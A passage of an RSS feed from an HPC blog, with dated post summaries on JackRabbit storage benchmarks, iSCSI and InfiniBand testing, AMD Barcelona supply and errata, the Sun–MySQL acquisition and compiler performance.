      <description>Searching all over. AMD has allowed the channel to be depleted. We are hearing from multiple sources that it will not be in the channel for a while. This is frustrating. It is nuts. It will do absolutely nothing to help AMD&amp;rsquo;s bottom line, and, that is one thing AMD sorely needs right now. All of our usual suppliers are saying they don&amp;rsquo;t have any. Now I found one supplier with some, and we are having them overnighted.</description>
    </item>
    
    <item>
      <title>A little JackRabbit on a test track</title>
      <link>https://blog.scalability.org/2008/02/a-little-jackrabbit-on-a-test-track/</link>
      <pubDate>Mon, 04 Feb 2008 18:20:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/a-little-jackrabbit-on-a-test-track/</guid>
      <description>I hadn&amp;rsquo;t mentioned it, perhaps I should have. We had been building/testing a unit, now sold and scheduled for shipping, which we wanted to see what it could do if we did some tuning. We tweaked, we measured, we tuned, we listened. Did some trial runs. Then we cracked the throttle wide open and let &amp;rsquo;er rip.
root@jr1:~# ./simple-write.bash start at Sun Jan 27 13:31:49 EST 2008 100+0 records in 100+0 records out 13421772800 bytes (13 GB) copied, 15.</description>
    </item>
    
    <item>
      <title>initial iSCSI results for JackRabbit</title>
      <link>https://blog.scalability.org/2008/02/initial-iscsi-results-for-jackrabbit/</link>
      <pubDate>Mon, 04 Feb 2008 17:56:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/initial-iscsi-results-for-jackrabbit/</guid>
      <description>We have been working on testing/benchmarking JackRabbit iSCSI over 10 GbE. Without spilling too many beans, let me describe how our benchmark tests differ from most everyone else&amp;rsquo;s, and then I will talk about the performance we get. Most benchmarks we have seen on iSCSI target the nullio device, or the ram disk. That is, they are benchmarks of the protocol, and have little if anything to do with what you will actually observe for performance.</description>
    </item>
    
    <item>
      <title>On the massive over-proliferation of social networking sites</title>
      <link>https://blog.scalability.org/2008/02/on-the-massive-over-proliferation-of-social-networking-sites/</link>
      <pubDate>Sun, 03 Feb 2008 19:19:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/on-the-massive-over-proliferation-of-social-networking-sites/</guid>
      <description>Today I received yet-another-invitation-to-some-new-social-network -site-that-promises-to-be-different. I did what I do with all of these invitations these days. I ignored it. VC&amp;rsquo;s take note.
There are too many of these sites. The field is crowded. The sites are not differentiated. Few to none of them will be the next Google. Or Microsoft. Few to none of them will be bought by Google or Microsoft. These sites are little more than glorified web pages with databases.</description>
    </item>
    
    <item>
      <title>twas ...</title>
      <link>https://blog.scalability.org/2008/02/twas/</link>
      <pubDate>Sat, 02 Feb 2008 01:32:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/twas/</guid>
      <description>&amp;hellip; the night before groundhog day, and all through the stores &amp;hellip; not a Barcelona could be found, no one could get the cores
The POs were in, parts placed on the lab table with care, in hopes that shiny new Barcelonas would soon be there. The systems were built snugly in their cases, while power was waiting to light up their fascias &amp;hellip; and momma in her lab coat, and I in my head lamp, had just settled in to measure some Amps, When out there on the landing, there arose such a clatter, I thought surely the UPS person had been around here.</description>
    </item>
    
    <item>
      <title>Sea change seemingly occurring in HPC for purchasers</title>
      <link>https://blog.scalability.org/2008/02/sea-change-seemingly-occuring-in-hpc-for-purchasers/</link>
      <pubDate>Fri, 01 Feb 2008 20:37:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/02/sea-change-seemingly-occuring-in-hpc-for-purchasers/</guid>
      <description>Last year, there was this meme: if only we could make cluster purchasing &amp;ldquo;easier&amp;rdquo;. Give people a one-stop shop for going online, and ordering their clusters. Lots of us (me included) thought this was going to be the wave of the future. Looks like we were, collectively, wrong.
We are being asked for more help now, not less. We are being asked for more specialized designs, not less. This doesn&amp;rsquo;t fit the model we thought would prevail.</description>
    </item>
    
    <item>
      <title>Inexpensive IB is here</title>
      <link>https://blog.scalability.org/2008/01/inexpensive-ib-is-here/</link>
      <pubDate>Mon, 28 Jan 2008 19:53:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/inexpensive-ib-is-here/</guid>
      <description>No, not &amp;ldquo;cheap&amp;rdquo; as in sub-standard, just inexpensive. See ClusterMonkey for details. Yeah, going to have to pick up some of these :) Even though I complain about OFED, when it works, it really works well. Building it is just a bear.</description>
    </item>
    
    <item>
      <title>Computing in the clouds ...</title>
      <link>https://blog.scalability.org/2008/01/computing-in-the-clouds/</link>
      <pubDate>Mon, 28 Jan 2008 17:34:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/computing-in-the-clouds/</guid>
      <description>Robin at Storagemojo tears into the latest buzzword-enabled marketing phrase, cloud computing. Robin&amp;rsquo;s thesis is that there are impediments to moving to the cloud, those being bandwidth and the &amp;ldquo;non-magic&amp;rdquo; nature of Google&amp;rsquo;s infrastructure. I don&amp;rsquo;t agree with his ascribing blame for the bandwidth issue to Cisco. It really is not their issue. Bandwidth providers in the US are the primary culprit &amp;hellip; we have been behind the curve for quite some time in terms of bandwidth delivered to business/homes.</description>
    </item>
    
    <item>
      <title>The need to keep building and packaging as separate operations</title>
      <link>https://blog.scalability.org/2008/01/the-need-to-keep-building-and-packaging-as-separate-operations/</link>
      <pubDate>Sat, 26 Jan 2008 16:23:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/the-need-to-keep-building-and-packaging-as-separate-operations/</guid>
      <description>I am working &amp;hellip; no &amp;hellip; struggling to &amp;ldquo;build&amp;rdquo; OFED 1.2.5.4 for our systems. OFED, for those who are not aware, is the bolus of drivers/infrastructure to support infiniband. I won&amp;rsquo;t get into the IB vs 10 GbE debate here, I see room for both technologies.</description>
    </item>
    
    <item>
      <title>What would be considered good iSCSI bonnie performance?</title>
      <link>https://blog.scalability.org/2008/01/what-would-be-considered-good-iscsi-bonnie-performance/</link>
      <pubDate>Fri, 25 Jan 2008 08:04:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/what-would-be-considered-good-iscsi-bonnie-performance/</guid>
      <description>I am curious. Running JackRabbit with a pair of 10 GbE cards. Getting some numbers, want to compare to others to see where we stand. Is more than 100 MB/s good? More than 200 MB/s? 300 MB/s? 10 GbE should give us ~1000MB/s. What fraction of the maximum bandwidth are you seeing in your iSCSI connection? We haven&amp;rsquo;t started tuning this yet.</description>
    </item>
    
    <item>
      <title>and a slightly hacked IOzone as well ...</title>
      <link>https://blog.scalability.org/2008/01/and-a-slightly-hacked-iozone-as-well/</link>
      <pubDate>Wed, 23 Jan 2008 22:24:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/and-a-slightly-hacked-iozone-as-well/</guid>
      <description>I wanted to test JackRabbit in cache, as well as out of cache. Unfortunately IOzone as written suffers from lots of 2G limits, and they limited their buffer sizes to 16M. So I bumped these up, and fixed the cache line size (it is 64 bytes for Opteron).
 Run began: Wed Jan 23 17:14:25 2008
 Excel chart generation enabled
 Auto Mode
 Using minimum file size of 16777216 kilobytes.
 Using Minimum Record Size 1048576 KB
 Using maximum file size of 16777216 kilobytes.</description>
    </item>
    
    <item>
      <title>more JackRabbit testing</title>
      <link>https://blog.scalability.org/2008/01/more-jackrabbit-testing/</link>
      <pubDate>Wed, 23 Jan 2008 21:30:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/more-jackrabbit-testing/</guid>
      <description>Updated a few things (bios) that I needed to. Reran tests. Remember, this is a sub $10,000 box (and it will do file and block IO &amp;hellip; simultaneously if needed). Running RAID6 with one hot spare.
&amp;lt;code&amp;gt;
root@jr1:~# ./simple-read.bash
start at Wed Jan 23 13:49:54 EST 2008
10000+0 records in
10000+0 records out
1342177280000 bytes (1.3 TB) copied, 1764.12 seconds, 761 MB/s
stop at Wed Jan 23 14:19:18 EST 2008
&amp;lt;/code&amp;gt;
and its companion</description>
    </item>
    
    <item>
      <title>A question I touched on briefly ...</title>
      <link>https://blog.scalability.org/2008/01/a-question-i-touched-on-briefly/</link>
      <pubDate>Wed, 23 Jan 2008 18:09:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/a-question-i-touched-on-briefly/</guid>
      <description>this person at Interop news goes into, in depth. The business person in me had difficulty understanding the acquisition. Sun didn&amp;rsquo;t have a missing technological niche that MySQL filled. MySQL had all the standard problems of growing a business, compounded by the Open source revenue model, which effectively eliminates distribution/redistribution revenues. There are many commercial outfits likely skirting the edge of legitimacy using MySQL in their shipping supported closed source products.</description>
    </item>
    
    <item>
      <title>Another day, another JackRabbit ...</title>
      <link>https://blog.scalability.org/2008/01/another-day-another-jackrabbit/</link>
      <pubDate>Wed, 23 Jan 2008 15:46:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/another-day-another-jackrabbit/</guid>
      <description>Built a new one for testing in the lab, though it looks like it may have a happy home elsewhere (along with some of its brethren) quite soon. Previously, for our huge write test case, we had sustained about 612 MB/s way way outside cache for our 1.3 TB write. That was after the unit had finished building the array, and been quiesced. We are about 88% built, the array is still cranking, and I wanted to see what it could do with a few bits tied behind its back.</description>
    </item>
    
    <item>
      <title>You live, you learn, hopefully you don&#39;t make the same mistake twice ...</title>
      <link>https://blog.scalability.org/2008/01/you-live-you-learn-hopefully-you-dont-make-the-same-mistake-twice/</link>
      <pubDate>Tue, 22 Jan 2008 15:43:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/you-live-you-learn-hopefully-you-dont-make-the-same-mistake-twice/</guid>
      <description>About two years ago, we were &amp;ldquo;invited&amp;rdquo; to pitch our business and plans to a local VC event. This was good, we were in the hunt for capital, and getting in front of lots of VC&amp;rsquo;s isn&amp;rsquo;t a bad idea. Well the &amp;ldquo;invited&amp;rdquo; part is in scare quotes, we had to compete with our executive summary. Ok, so we made it past the initial &amp;ldquo;competition&amp;rdquo; (hmmm notice the scare quotes). We had to prepare our slides, our talks and some documents.</description>
    </item>
    
    <item>
      <title>Feedback is starting to emerge on the Sun|MySQL front</title>
      <link>https://blog.scalability.org/2008/01/feedback-is-starting-to-emerge-on-the-sunmysql-front/</link>
      <pubDate>Mon, 21 Jan 2008 00:55:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/feedback-is-starting-to-emerge-on-the-sunmysql-front/</guid>
      <description>and it isn&amp;rsquo;t necessarily all positive. Well, ok, not on the acquisition, but on the current state of affairs prior to the acquisition. This is the interesting aspect of this. Sun is being viewed as a way to save MySQL. Don MacAskill of smugmug has some interesting comments. Quoting Don:
The Laura to which he refers is Laura Thompson, and her blog, tech ramblings. The particular post  discusses some of the issues.</description>
    </item>
    
    <item>
      <title>mpiHMMer update</title>
      <link>https://blog.scalability.org/2008/01/mpihmmer-update/</link>
      <pubDate>Sun, 20 Jan 2008 22:22:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/mpihmmer-update/</guid>
      <description>Well, we now have a mailing list and a repository up in addition to the main page. There are some binary RPMs available. My question to the teeming masses of mpiHMMer users (current or future), what platforms/architectures/OSes are you interested in binary builds for? And support for? Please either answer in a response to this or on the mailing list. This would be quite helpful to know going forward.</description>
    </item>
    
    <item>
      <title>Sun buys Mysql</title>
      <link>https://blog.scalability.org/2008/01/sun-buys-mysql/</link>
      <pubDate>Wed, 16 Jan 2008 13:45:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/sun-buys-mysql/</guid>
      <description>So Sun continues their buying spree. First with CFS, and now Mysql. This is quite relevant to HPC for a variety of reasons. Customers have been telling me that they are quite worried about Lustre as a result of the Sun acquisition. There is a lot of speculation about its (likely) limited future outside of Solaris.
Then there is ZFS, the sort of - kind of - open source file system that is sort of - kind of - better than anything else.</description>
    </item>
    
    <item>
      <title>Scientific instrument advertising ... done right!</title>
      <link>https://blog.scalability.org/2008/01/scientific-instrument-advertising-done-right/</link>
      <pubDate>Mon, 14 Jan 2008 18:05:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/scientific-instrument-advertising-done-right/</guid>
      <description>This is too funny. This is the way it should be done &amp;hellip; kudos to Biorad (and maybe I can figure out a way to get these guys to use some JackRabbits &amp;hellip; not for amplification, but for storing the data &amp;hellip;) </description>
    </item>
    
    <item>
      <title>DragonFly update: humming along ...</title>
      <link>https://blog.scalability.org/2008/01/dragonfly-update-humming-along/</link>
      <pubDate>Sun, 13 Jan 2008 18:55:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/dragonfly-update-humming-along/</guid>
      <description>Haven&amp;rsquo;t updated this in a while. Done lots of code/function clean up. Still have more to do, but to get it to a usable beta state is very much closer than it was a month ago. Lots of items are working &amp;hellip; in a cool web 2.0 ajaxy sorta kinda way. And if we did it right, it gracefully degrades to average everyday HTML in the event that you want to shun javascript (sometimes a good idea in and of itself).</description>
    </item>
    
    <item>
      <title>Why use Linux?</title>
      <link>https://blog.scalability.org/2008/01/why-use-linux/</link>
      <pubDate>Sat, 12 Jan 2008 17:41:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/why-use-linux/</guid>
      <description>There are many reasons. Some economic and TCO, some performance, some development, some stability. Well, that last one is interesting. We hear occasionally about systems stability, ability to withstand withering loads, ability to function and multifunction with ease. The machine that this blog has been running on, shared with multiple other websites, and other functions, is running Linux. Patches relevant for its functionality have been applied with none of the &amp;ldquo;you must reboot now&amp;rdquo; garbage that other OSes impose.</description>
    </item>
    
    <item>
      <title>Update on file formats</title>
      <link>https://blog.scalability.org/2008/01/update-on-file-formats/</link>
      <pubDate>Thu, 10 Jan 2008 08:42:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/update-on-file-formats/</guid>
      <description>Robin Harris noted that he might have misinterpreted what happened. There is a blog which explains it here. Yes, Robin is correct, Microsoft does inspire strong reactions. Allow me to be blunt about it and say not all of them are deserved. The HPC people I have met and spoken with are good people. I don&amp;rsquo;t agree about some of their directions, but the vision is cool, and it looks correct.</description>
    </item>
    
    <item>
      <title>Interesting thoughts on CS education</title>
      <link>https://blog.scalability.org/2008/01/interesting-thoughts-on-cs-education/</link>
      <pubDate>Tue, 08 Jan 2008 22:14:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/interesting-thoughts-on-cs-education/</guid>
      <description>We haven&amp;rsquo;t covered CS education as such in this blog, as rather surprisingly, most of high performance computing is not being done/driven by CS people. This is probably unfortunate for several reasons, most of which is that many HPC practitioners are taking localized utilitarian views of HPC, and not looking at bigger pictures which may net them additional benefit. That said, the authors of this article imply that the state of CS education is in decline, that CS departments are not creating the computer scientists we need, rather they are creating java programmers, and others well insulated from a deeper understanding of the machine.</description>
    </item>
    
    <item>
      <title>Crystals ... diamond structure, and something called K_4</title>
      <link>https://blog.scalability.org/2008/01/crystals-diamond-structure-and-something-called-k_4/</link>
      <pubDate>Mon, 07 Jan 2008 15:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/crystals-diamond-structure-and-something-called-k_4/</guid>
      <description>I am going to have to look up the article referred to by /. This morning, they linked to an article in AMS about crystal symmetry, and a structure they called K_4. This structure, they claimed, does not occur in nature. Odd I thought &amp;hellip; as the picture they showed, well, I thought I had seen it before.
So using Inventor, I pulled out an old copy of a Gallium Arsenide lattice I used for simulations, more than a decade ago (aren&amp;rsquo;t open formats nice?</description>
    </item>
    
    <item>
      <title>Fortran version of the compiler quality test</title>
      <link>https://blog.scalability.org/2008/01/fortran-version-of-the-compiler-quality-test/</link>
      <pubDate>Sun, 06 Jan 2008 08:40:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/fortran-version-of-the-compiler-quality-test/</guid>
      <description>Quite a few people asked offline for a fortran version of the tests I indicated in the last post on this subject. So here is the basic code and its performance. What is interesting is that, for the same inputs as the C code, with no heroic loop unrolling/unwinding, the Fortran is about 3x faster than the C. Well, except for ifort. But we will get into that more later on.</description>
    </item>
    
    <item>
      <title>MPI-HMMer site is now live</title>
      <link>https://blog.scalability.org/2008/01/mpi-hmmer-site-is-now-live/</link>
      <pubDate>Sat, 05 Jan 2008 23:31:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/mpi-hmmer-site-is-now-live/</guid>
      <description>MPI-HMMer, the implementation of Professor Eddy&amp;rsquo;s HMMer code built for MPI clusters, is now live on the net. www.mpihmmer.org will get you there, as will mpihmmer.org. There are some nice nuggets buried within &amp;hellip; the papers, and a short discussion of MPI-HMMer-boost, which is a multi-layer parallel-accelerated implementation of HMMer. As usual, we are in search of meaningful and big benchmark tests to see what we can do (and if we can break it).</description>
    </item>
    
    <item>
      <title>On the retention of electronic data</title>
      <link>https://blog.scalability.org/2008/01/on-the-retention-of-electronic-data/</link>
      <pubDate>Fri, 04 Jan 2008 17:55:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/on-the-retention-of-electronic-data/</guid>
      <description>One of the things I and many other people worry about is how to retain data for long periods of time. This means that the data has to be accessible, readable, and convertible. This suggests that only open formats and file systems should ever be considered for data storage and retention. With this in mind, I read Robin Harris&#39; Storagemojo column this morning. Yeah, I would say he nailed it.</description>
    </item>
    
    <item>
      <title>HPCWire has lots of good reading for early 2008</title>
      <link>https://blog.scalability.org/2008/01/hpcwire-has-lots-of-good-reading-for-early-2008/</link>
      <pubDate>Fri, 04 Jan 2008 16:17:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/hpcwire-has-lots-of-good-reading-for-early-2008/</guid>
      <description>I don&amp;rsquo;t have time right now to comment in depth, but read John West&amp;rsquo;s predictions, as well as most of the other editorials. Spot on in most cases. Mirrors things we have been saying and working on for a while. They are at http://hpcwire.com</description>
    </item>
    
    <item>
      <title>Bandwidth as the limiting factor for HPC and IT</title>
      <link>https://blog.scalability.org/2008/01/bandwidth-as-the-limiting-factor-for-hpc-and-it/</link>
      <pubDate>Fri, 04 Jan 2008 07:22:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/bandwidth-as-the-limiting-factor-for-hpc-and-it/</guid>
      <description>I postulated for a while that this was the case. HPC technologies tend to evolve to a point of bandwidth (or latency) limitation. The broader IT market tends to follow.
This is basically stating that as you build out resources, common designs will tend to oversubscribe critical information pathways. I had a conversation with a potential partner today where we were talking about HPC across multiple different subfields and we kept coming back to this.</description>
    </item>
    
    <item>
      <title>12 hours into the new year, and I have 210 spam in my spam-box</title>
      <link>https://blog.scalability.org/2008/01/12-hours-into-the-new-year-and-i-have-210-spam-in-my-spam-box/</link>
      <pubDate>Tue, 01 Jan 2008 17:12:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2008/01/12-hours-into-the-new-year-and-i-have-210-spam-in-my-spam-box/</guid>
      <description>This would be about 12.8k spam estimated for this month. Last month I had 10.9k. I heard somewhere that someone said spam is decreasing. My measurements (graphs over the last year) show quite the opposite. Our spam-box is on a per user basis. Each mail runs an annotation filter gauntlet. At the end of this gauntlet, it is classified as spam or not-spam. Not all mail reaches the gauntlet. Most of the &amp;ldquo;mail&amp;rdquo; gets rejected.</description>
    </item>
    
    <item>
      <title>Compiler quality</title>
      <link>https://blog.scalability.org/2007/12/compiler-quality/</link>
      <pubDate>Mon, 31 Dec 2007 17:52:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/compiler-quality/</guid>
      <description>One of the comments to the previous post got me thinking about testing code on the same machine under various compilers. It is fairly well known that the Intel compilers emit code that doesn&amp;rsquo;t select reasonable operational paths on AMD processors, which usually results in identical binaries having vast performance differences on very similar platforms. This doesn&amp;rsquo;t make a great deal of sense from a technological point of view &amp;hellip; you want to test for SSE* support, and not use processor strings to select code paths; specifically, a path which may be disabled by processor string on your own CPUs, but enabled/fixed in a microcode upgrade, would still be deselected &amp;hellip; That is, such efforts are self defeating in the end.</description>
    </item>
    
    <item>
      <title>Quick note to people who register and don&#39;t get emails ...</title>
      <link>https://blog.scalability.org/2007/12/quick-note-to-people-who-register-and-dont-get-emails/</link>
      <pubDate>Sat, 22 Dec 2007 21:56:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/quick-note-to-people-who-register-and-dont-get-emails/</guid>
      <description>Sorry about that, but it looks like some email domains are still using DULs that contain business DSL and business cable modem. If you are having trouble getting the emails, please use either a gmail.com, or similar (saner) email system. They generally do not have problems getting email to them. And they don&amp;rsquo;t use RBLs/DULs. Go figure.
You may have seen me complain in the past about RBLs and their evil twin, DULs before.</description>
    </item>
    
    <item>
      <title>Why does IE do things the way IE does?</title>
      <link>https://blog.scalability.org/2007/12/why-does-ie-do-things-the-way-ie-does/</link>
      <pubDate>Thu, 20 Dec 2007 03:27:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/why-does-ie-do-things-the-way-ie-does/</guid>
      <description>I keep running into small (brick) walls with IE (mis)features. The latest one was when IE likes to send the whole file name &amp;hellip; including path and drive &amp;hellip; as the file upload name. The previous one was when IE refused to do the AJAXified file upload progress meter. Works on all the other browsers on all the platforms I have tried. Just not IE.
I seem to remember something like this from some years ago with DragonFly&amp;rsquo;s predecessor.</description>
    </item>
    
    <item>
      <title>There are days ...</title>
      <link>https://blog.scalability.org/2007/12/there-are-days/</link>
      <pubDate>Thu, 20 Dec 2007 03:19:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/there-are-days/</guid>
      <description>like this &amp;hellip;
&amp;hellip; Been hacking away at DragonFly. More soon.</description>
    </item>
    
    <item>
      <title>What he said ...</title>
      <link>https://blog.scalability.org/2007/12/what-he-said/</link>
      <pubDate>Mon, 17 Dec 2007 17:16:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/what-he-said/</guid>
      <description>John West has a good article on a phenomenon in HPC. Generally speaking there is a disconnect between chip vendors and final customers. This disconnect often means that high performance computing solutions vendors (like my day job) often have to deal with &amp;hellip; well &amp;hellip; interesting and exciting problems, in supply, quality, and so on.
John talks about this with respect to chip vendors, but his analysis also applies to motherboard vendors, ram makers, disk vendors, and so on.</description>
    </item>
    
    <item>
      <title>The joy of hardware ... when things don&#39;t respond as they should ...</title>
      <link>https://blog.scalability.org/2007/12/the-joy-of-hardware-when-things-dont-respond-as-they-should/</link>
      <pubDate>Sun, 16 Dec 2007 18:39:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/the-joy-of-hardware-when-things-dont-respond-as-they-should/</guid>
      <description>IPMI is (sometimes) a wonderful thing. It can help you figure out problems, provide a console over network capability, as well as power cycle machines. This is of course, when it works.
When it doesn&amp;rsquo;t, it is a nightmare. We have a cluster in place with a mostly functional IPMI stack. Customer indicated a problem with a node, and we brought it back to the lab. Turns out that during a recent move of theirs, they damaged a port on it.</description>
    </item>
    
    <item>
      <title>New article up</title>
      <link>https://blog.scalability.org/2007/12/new-article-up/</link>
      <pubDate>Thu, 13 Dec 2007 16:03:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/new-article-up/</guid>
      <description>Over at Linux Magazine, they have a multi-core cookbook. This is a site dedicated to pragmatic HPC topics &amp;hellip; more than just HPC, as everyone has to deal with multi-core these days. The question is how to program them. I wrote an article (well first of three, two written and submitted, third one I am still working on) on how to use OpenMP. This is pragmatic in that it shows you how to go from a bare Linux machine to OpenMP enabled in a short period of time.</description>
    </item>
    
    <item>
      <title>Paying too much for graphics ... companies ...</title>
      <link>https://blog.scalability.org/2007/12/paying-too-much-for-graphics-companies/</link>
      <pubDate>Thu, 13 Dec 2007 05:23:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/paying-too-much-for-graphics-companies/</guid>
      <description>That bastion of accurate reporting, Valleywag, has a short note on AMD taking a charge for the ATI acquisition. Quite a few of us questioned the wisdom of the move at the time. nVidia would have made more sense, but given the market caps, it would have been nVidia acquiring AMD, and that isn&amp;rsquo;t likely to have happened. Well, as John at InsideHPC reported earlier in the week, AMD was not exactly rolling in the good news over the past two weeks.</description>
    </item>
    
    <item>
      <title>As the market (rapidly) grows</title>
      <link>https://blog.scalability.org/2007/12/as-the-market-rapidly-grows/</link>
      <pubDate>Fri, 07 Dec 2007 15:14:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/as-the-market-rapidly-grows/</guid>
      <description>We have been pointing out for a long while that the HPC market is growing at a break-neck pace. The latest IDC numbers continue to support these claims. Many places have the numbers and the analysis. Pointing to HPCwire&amp;rsquo;s analysis: 
Yeah, that about sums it up. Now remember, that Linux is the most common and largest fraction of the HPC server market, and despite protestations (and marketing) to the contrary from interested parties, this shows no signs of letting up, or changing in any significant way.</description>
    </item>
    
    <item>
      <title>Lots of others have noticed as well ... [Updated]</title>
      <link>https://blog.scalability.org/2007/12/lots-of-others-have-noticed-as-well/</link>
      <pubDate>Fri, 07 Dec 2007 13:56:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/lots-of-others-have-noticed-as-well/</guid>
      <description>It is becoming clearer and clearer that we aren&amp;rsquo;t the only ones calling on AMD to do something about the Barcelona issue. AMD has too much invested in the system to be acting the way it is, damaging its relationships the way it is. Some of the others are simply suggesting a fessing up to the situation, as it appears that spokespeople are trying to spin something hard. [**update: **the register has a take] No.</description>
    </item>
    
    <item>
      <title>Free advice to AMD on Barcelona</title>
      <link>https://blog.scalability.org/2007/12/free-advice-to-amd-on-barcelona/</link>
      <pubDate>Thu, 06 Dec 2007 16:19:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/free-advice-to-amd-on-barcelona/</guid>
      <description>First off, it is worth noting that the handling of the problem is causing far more damage to AMD than the problem would &amp;hellip; investment types call it loss of goodwill. This is the indication of something like a rudderless ship in motion. It needs to be corrected forthwith. Like yesterday. AMD needs to
 * Make the patch available on its website
 * Hire some contractors to make patches for RHEL/SuSE/Ubuntu, as well as source code installable packages which will build against the kernel
 * Lose the warranty hole.</description>
    </item>
    
    <item>
      <title>Non-competes</title>
      <link>https://blog.scalability.org/2007/12/non-competes/</link>
      <pubDate>Thu, 06 Dec 2007 16:02:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/non-competes/</guid>
      <description>From /., I saw an article on non-competes. It made the claim that they are the DRM of human capital. DRM is, for all intents and purposes, digital rights management, which is post sales control over assets. Human capital is a euphemism of course, for people &amp;hellip; knowledge workers specifically (which is itself a euphemism &amp;hellip; ) What struck me (as a Michigander of about 2 decades now) was this snippet:</description>
    </item>
    
    <item>
      <title>I understand the AMD Barcelona issues now</title>
      <link>https://blog.scalability.org/2007/12/i-understand-the-amd-barcelona-issues-now/</link>
      <pubDate>Thu, 06 Dec 2007 04:07:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/i-understand-the-amd-barcelona-issues-now/</guid>
      <description>I spoke with the AMD folks during SC and afterwards. Someone leaked the info yesterday, and today on the x86_64 discussion group, the errata and patches were detailed. I have had the patches for a few days now, and have a bios update I need to apply to a motherboard. That said, what this is, is a particular TLB-cache interaction, that under a very specific set of circumstances, will trigger a machine check exception, and hang a machine.</description>
    </item>
    
    <item>
      <title>Not up yet, but ... two articles coming soon to a site near you</title>
      <link>https://blog.scalability.org/2007/12/not-up-yet-but-two-articles-coming-soon-to-a-site-near-you/</link>
      <pubDate>Thu, 06 Dec 2007 03:49:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/12/not-up-yet-but-two-articles-coming-soon-to-a-site-near-you/</guid>
      <description>Check out Doug Eadline&amp;rsquo;s MultiCore Cookbook at Linux Magazine. Kudos to LM for continuing efforts to promote all manner of relevant articles. Sadly, some web publications may call this &amp;ldquo;zealotry&amp;rdquo; or similar, but as Linux continues to dominate HPC, and HPC does in fact continue to grow at a blistering pace, it appears that LM is one of the very small number of publications of record focusing upon HPC for end users.</description>
    </item>
    
    <item>
      <title>AMD vs Intel benchmarks for latest chips</title>
      <link>https://blog.scalability.org/2007/11/amd-vs-intel-benchmarks-for-latest-chips/</link>
      <pubDate>Thu, 29 Nov 2007 05:58:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/amd-vs-intel-benchmarks-for-latest-chips/</guid>
      <description>John at InsideHPC has a pointer to an article on benchmarks of the chips. There is no doubt that Intel is doing a good job of coming out with chips in a timely manner, something AMD is not doing well. Regardless of my criticism, what is interesting are the real-world tests. I don&amp;rsquo;t care so much about WinRAR and other things that, generally speaking, won&amp;rsquo;t impact my or my customers&amp;rsquo; lives all that much.</description>
    </item>
    
    <item>
      <title>Science ... with an attitude !</title>
      <link>https://blog.scalability.org/2007/11/science-with-an-attitude/</link>
      <pubDate>Wed, 28 Nov 2007 22:47:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/science-with-an-attitude/</guid>
      <description>Doing some gear shifting, I found a link to xkcd. On it, I found this drawing &amp;hellip;
[xkcd #54](http://xkcd.com/54/)
[channeling Austin Powers] Yeah baby!</description>
    </item>
    
    <item>
      <title>As the market evolves ...</title>
      <link>https://blog.scalability.org/2007/11/as-the-market-evolves/</link>
      <pubDate>Wed, 28 Nov 2007 15:32:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/as-the-market-evolves/</guid>
      <description>I have been a strong proponent of accelerators for quite some time. Unfortunately, as indicated, we have sadly lacked success in trying to convince VCs and others to help fund the development we saw was needed. &amp;ldquo;The market will be there,&amp;rdquo; we said. &amp;ldquo;When?&amp;rdquo; they asked. &amp;ldquo;Soon,&amp;rdquo; we replied. That wasn&amp;rsquo;t good enough for them. That was ~2 years ago. Now, free from much of the hype (though marketeers still inject a little every now and then), we see a rapidly developing accelerator marketplace.</description>
    </item>
    
    <item>
      <title>Why am I surprised that people found this surprising?</title>
      <link>https://blog.scalability.org/2007/11/why-am-i-surprised-that-people-found-this-surprising/</link>
      <pubDate>Wed, 28 Nov 2007 14:08:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2007/11/why-am-i-surprised-that-people-found-this-surprising/</guid>
      <description></description>
    </item>
    
    <item>
      <title>Data center growth numbers</title>
